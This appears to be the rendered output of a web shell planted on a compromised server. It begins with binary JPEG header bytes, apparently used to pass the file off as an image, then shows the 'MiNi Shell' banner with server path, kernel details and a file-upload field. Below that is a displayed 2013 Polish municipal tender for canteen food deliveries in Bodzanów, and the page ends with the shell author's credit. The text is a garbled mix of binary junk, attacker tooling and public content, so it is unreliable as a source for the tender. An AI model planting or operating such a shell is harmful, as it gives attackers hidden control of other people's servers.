JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130903/354974-N-2013.html

<p class="kh_header"><b>Bodzanów: Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 1 -  artykułów spożywczych
zadanie nr 2 - owoców i warzyw gat. I
zadanie nr 3 - mięsa i wędlin</b><br>
<b>Numer ogłoszenia: 354974 - 2013; data zamieszczenia: 03.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Bodzanów , ul. Bankowa 7, 09-470 Bodzanów, woj. mazowieckie, tel. 24 2607006 w. 30, faks 24 2607065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bodzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawcy na dostawę do stołówki dla podopiecznych GOPS-u w Bodzanowie:
zadanie nr 1 -  artykułów spożywczych
zadanie nr 2 - owoców i warzyw gat. I
zadanie nr 3 - mięsa i wędlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 
Lp.	Nazwa przedmiotu zamówienia	Jednostka	Przewidywana wysokość dostawy
	Art. Spożywcze		
1.	Mąka pszenna typu Szymanowska 1 kg	kg	150
2. 	Mąka pszenna typu Wrocławska 1 kg	kg	60 
3.	Mąka pszenna typu Krupczatka 1kg	kg	50 
4.	Ryż sypki 1kg	kg	150 
5.	Makaron (świderki) 	kg	250 
6.	Kasza jęczmienna 1 kg	kg	20 
7.	Koncentrat pomidorowy 1litrowy 30% 	szt.	   150 
8.	Przecier ogórkowy na zupę ok. 300-330 ml	szt.	50 
9.	Olej uniwersalny typu Kujawski 3 litr butelka	szt.	50 
10.	Śmietana 18% (do zupy) - 200ml	szt. 	1000
11.	Ser biały półtłusty	kg	250
12.	Mleko świeże 3,2%	l	20

Termin realizacji usługi - od dnia 01 października 2013r. do dnia 13 czerwca 2014r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  -Dom Parafialny- wg potrzeb Zamawiającego.
CPV - 15 80 00 00 - 6 - Różne produkty spożywcze

Zadanie 2
Lp.	Nazwa przedmiotu zamówienia	Jednostka	Przewidywana wysokość dostawy
	Warzywa i Owoce		
1.	Porcje włoszczyzny 	szt.	250
2. 	Marchew 	kg	30 
3.	Pietruszka	kg	20 
4.	Seler	kg	10 
5.	Por	szt.	100 
6.	Kapusta biała główki	kg	300 
7.	Kapusta kiszona	kg	   100 
8.	Ziemniaki białe	kg	2000 
9.	Buraki czerwone	kg	30 
10.	Jabłka typu lobo	kg	300 

Termin realizacji usługi - od dnia 01 października 2013r. do dnia 13 czerwca 2014r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie -Dom Parafialny- wg potrzeb Zamawiającego.
CPV - 15 30 00 00 - 1 - Owoce, warzywa i podobne produkty

Zadanie 3
Lp.	Nazwa przedmiotu zamówienia	Jednostka	Przewidywana wysokość dostawy
	Mięso i wędliny		
1.	Mięso mielone wieprzowe gat. I 	kg	150
2.	Mięso mielone wieprzowo - wołowe gat. I 	kg	20 
3.	Porcje drobiowe rosołowe 	kg	150 
4.	Ćwiartki z kurczaka 	kg	100 
5.	Mięso gulaszowe wieprzowe gat. I 	kg	100 
6.	Kiełbasa  zwyczajna gat. I 	kg	   30 
7.	Kiełbasa cienka typu Śląska, Podwawelska	kg	50 
8.	Mortadela	kg	30 
9.	Parówki drobiowe cienkie 	kg	150 
10.	Parówki wieprzowe cienkie 	kg	200 
11.	Boczek wędzony gat. I	kg	20

Termin realizacji usługi - od dnia 01 października 2013r. do dnia 14 czerwca 2014r.
Dowóz do kuchni GOPS, ul. Poniatowskiego 1 w Bodzanowie  -Dom Parafialny-wg potrzeb Zamawiającego.
CPV - 15 10 00 00 - 9 - produkty zwierzęce, mięso i produkty mięsne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1, 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust 1 ustawy -Prawo Zamówień publicznych (w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia oświadczenie składa każdy z Wykonawców osobno bądź pełnomocnik występujący w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia) - wg wzoru załącznik nr 1b/2b/3b do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
1. Wypełniony formularz oferty załączony do SIWZ - wg wzoru załącznik nr 1/2/3 do SIWZ
2. Wypełniony formularz cenowy załączony do SIWZ - wg wzoru załącznik nr 1a/2a/3a do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu. Zmiany te nie mogą naruszać postanowień art. 144 ust. 1 ustawy Prawo zamówień publicznych, a potrzeba ich wprowadzenia może wynikać jedynie z następujących okoliczności:
7)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
8)	zmian wynagrodzenia w przypadku ustawowej zmiany podatku VAT,
9)	zmian nazwy np. Wykonawcy,
10)	waloryzacji wynagrodzenia,
11)	oczywistych omyłek pisarskich w umowie oraz załącznikach,
12)	innych, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bodzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminnym Ośrodku Pomocy Społecznej w Bodzanowie, ul. Bankowa 7, 09-470 Bodzanów, (p. Kierownika GOPS).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2013 godzina 09:00, miejsce: Sekretariat Urzędu Gminy w Bodzanowie, pok. Nr 3, ul. Bankowa 7, 09-470 Bodzanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych do stołówki    dla podopiecznych GOPS-u..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Lp.	Nazwa przedmiotu zamówienia	Jednostka	Cena jednostkowa sprzedaży w zł.	Przewidywana wysokość dostawy	Wartość przedmiotu zamówienia
	Art. Spożywcze	1	2	3	2x3
1.	Mąka pszenna typu Szymanowska 1 kg	kg		150	
2. 	Mąka pszenna typu Wrocławska 1 kg	kg		60 	
3.	Mąka pszenna typu krupczatka 1kg	kg		50 	
4.	Ryż sypki 1kg	kg		150 	
5.	Makaron (świderki) 	kg		250 	
6.	Kasza jęczmienna	kg		20 	
7.	Koncentrat pomidorowy 1litrowy 30% 	szt.		   150 	
8.	Przecier ogórkowy na zupę ok300-330 ml	szt.		50 	
9.	Olej uniwersalny typu Kujawski 3 litr butelka	szt.		50 	
10.	Śmietana 18% (do zupy) - 200ml	szt. 		1000	
11.	Ser biały półtłusty	kg		250	
12.	Mleko świeże 3,2%	l		20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa owoców i warzyw do stołówki    dla podopiecznych GOPS-u.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2

Lp.	Nazwa przedmiotu zamówienia	Jednostka	Cena jednostkowa sprzedaży w zł.	Przewidywana wysokość dostawy	Wartość przedmiotu zamówienia
	Warzywa i Owoce	1	2	3	2x3
1.	Porcje włoszczyzny 	szt.		250	
2. 	Marchew 	kg		30 	
3.	Pietruszka	kg		20 	
4.	seler	kg		10 	
5.	Por	szt.		100 	
6.	Kapusta biała główki	kg		300 	
7.	Kapusta kiszona	kg		   100 	
8.	Ziemniaki białe	kg		2000 	
9.	Buraki czerwone	kg		30 	
10.	Jabłka typu lobo	kg		300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i wędlin do stołówki    dla podopiecznych GOPS-u.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3

Lp.	Nazwa przedmiotu zamówienia	Jednostka	Cena jednostkowa sprzedaży w zł.	Przewidywana wysokość dostawy	Wartość przedmiotu zamówienia
	Mięso i wędliny	1	2	3	2x3
1.	Mięso mielone wieprzowe gat. I 	kg		150	
2.	Mięso mielone wieprzowo - wołowe gat. I 	kg		20 	
3.	Porcje drobiowe rosołowe 	kg		150 	
4.	Ćwiartki z kurczaka 	kg		100 	
5.	Mięso gulaszowe wieprzowe gat. I 	kg		100 	
6.	Kiełbasa  zwyczajna gat. I 	kg		   30 	
7.	Kiełbasa cienka typu Śląska, Podwawelska	kg		50 	
8.	Mortadela	kg		30 	
9.	Parówki drobiowe cienkie 	kg		150 	
10.	Parówki wieprzowe cienkie 	kg		200 	
11.	Boczek wędzony gat. I	kg		20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com